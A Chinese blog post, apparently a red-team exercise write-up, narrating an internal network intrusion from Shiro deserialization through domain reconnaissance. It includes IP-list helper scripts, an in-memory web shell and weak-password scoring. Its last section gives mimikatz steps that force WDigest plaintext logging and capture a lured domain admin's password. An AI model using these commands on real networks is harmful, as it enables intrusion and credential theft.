title:记一次简单的内网刷分(仅用于学习交流,请勿做非法操作)
文章目录
前期:信息收集,外网打点
信息收集:
旁站、c端、端口、域名、子域名、whois、web指纹、公众号、小程序、APP等
部分截图:
工具oneforall
工具webalivescan
得到入口:
利用工具:shiroExp
shiro反序列化漏洞
权限维持
写入内存马
后将入口改成蚁剑,流量传输更安全
初步的内网信息收集
入口Ip:
172.16.14.211
判断是否存在域(net view /domain)
中期:内网梳理,找寻域控
内网信息收集
初步的收集下内网信息
域相关
域内控制器查找(net time /domain)
当前域控:
xxx.xxx.net
定位域控
ip为:192.168.10.239
其他信息
查询域用户密码过期等信息(net accounts /domain)
网段及存活IP
存活ip探测:
这里用的是局域网查看工具:
下载链接:https://pan.baidu.com/s/1vs60YNvKzftk4KQlLKXF6A 提取码:hzhz
最后生成的xxx.TXT如下:
收集出存活IP后,可以写个脚本,来筛选IP
#使用前需要替换文件名 #运行后会在当前目录下生成restxt #py3 import re if __name__ == '__main__': tmp = set() # 导入,去重 with open('172.17.0.0.txt', mode='r') as f: lines = f.readlines() for line in lines: line = line.strip() ip = re.match(r'(([01]{0,1}\d{0,1}\d|2[0-4]\d|25[0-5])\.){3}([01]{0,1}\d{0,1}\d|2[0-4]\d|25[0-5])', line) tmp.add(ip.group()) # print(tmp) # 导出 with open('res.txt', mode='w') as f: for key in tmp: f.write(key) f.write('\n')
批量IP转C段
有时候,探测到存活IP较多的情况下,也需要批量IP转C段,这里也贴上脚本
# -*- coding: UTF-8 -*- #py2 #注意替换readpath和writepath import IPy def ipToC(): ips = set() readPath = 'ip.txt' writePath = 'ip_c.txt' outFile = open(writePath, 'w') with open(readPath, 'r') as f: for line in f: ip = line.strip('\n') ip_c = IPy.IP(ip).make_net('255.255.255.0') if ip_c not in ips: outFile.write(str(ip_c) + '\n') ips.add(ip_c) outFile.close() print '转换结束' if __name__ == '__main__': ipToC()
端口扫描
每个师傅使用的工具都不一样,这里就不再赘述了
内网web探测
我这里的思路是扫描一下常见的web服务端口,然后快速刷分
如:80 88 443 7001 8000-9000 9200等等
收集出来的信息如下:
然后写脚本拼接成url,用工具来刷分
拼接后如下:
code如下:
#author: 想学点black技术 #time: 2021年3月2日11:33:51 #环境: python3 def get_ip_port(): with open("ip+port.txt", mode='r') as f: lines = f.readlines() for line in lines: try: ip, port = line.split('\t')[0], line.split('\t')[1].strip() url = 'https://' + ip if port == 443 else 'http://' + ip + ':' + port result.add(url) except Exception as e: print(e) # print(url) sava_to_local() def sava_to_local(): with open('res.txt', mode='w') as f: for key in result: f.write(key) f.write('\n') if __name__ == '__main__': # 散列遍历快、无重复 result = set() get_ip_port()
等等
如网络设备,安全设备,域内共享,路由,策略等等
后期:内网刷分,凭据窃取
万能弱口令-刷分
部分截图:
常见web漏洞-刷分
部分截图,如未授权
如海康威视等机型登录绕过可查看监控画面
等等
常见操作系统漏洞-刷分
工具:railgun
如:最常见的17-010
脏牛提权
域凭据窃取-最终目的
目标域服务器:win 2012 R2
特征:无法窃取明文密码,得修改注册表后重启才可
导出HASH:
无法解密,逐渐烦躁
利用mimikatz存储凭据(类似键盘记录):
1.修改成记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2.使用mimikatz的一个功能:
privilege::debug misc::memssp
3.修改完之后使用以下命令锁屏
rundll32.exe user32.dll,LockWorkStation
4.勾引域管理员
等用户进入后就可以在C:\Windows\System32\mimilsa.log里面存储登录的密码
然后,成功的拿到了我们想要的密码
写在最后的话:
域渗透的思路就是:通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。